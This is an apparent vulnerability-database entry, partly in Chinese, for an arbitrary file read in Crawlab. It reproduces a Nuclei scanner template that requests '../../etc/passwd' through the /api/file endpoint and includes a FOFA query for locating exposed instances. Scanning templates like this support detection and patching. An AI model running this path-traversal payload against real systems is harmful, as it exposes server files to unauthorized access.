crawlab-lfi: Crawlab - Arbitrary File Read

日期: 2025-08-01 | 影响软件: Crawlab | POC: 已公开

漏洞描述

Crawlab is vulnerable to arbitrary file read.

PoC代码[已公开]

id: crawlab-lfi

info:
  name: Crawlab - Arbitrary File Read
  author: pussycat0x
  severity: high
  description: Crawlab is vulnerable to arbitrary file read.
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Crawlab%20file%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="Crawlab"
  tags: crawlab,lfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/file?path=../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "data\":\""
          - "error\":"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402202dac6db9bec46171172994dbfc9790ad30993bd2b9635f437269ef2d6f5ecdcb02204f39b8ec723ab8940aa413af4b7ca9a37e4b9fd90a7983d7ea156ea339795e1f:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/other/crawlab-lfi.yaml

相关漏洞推荐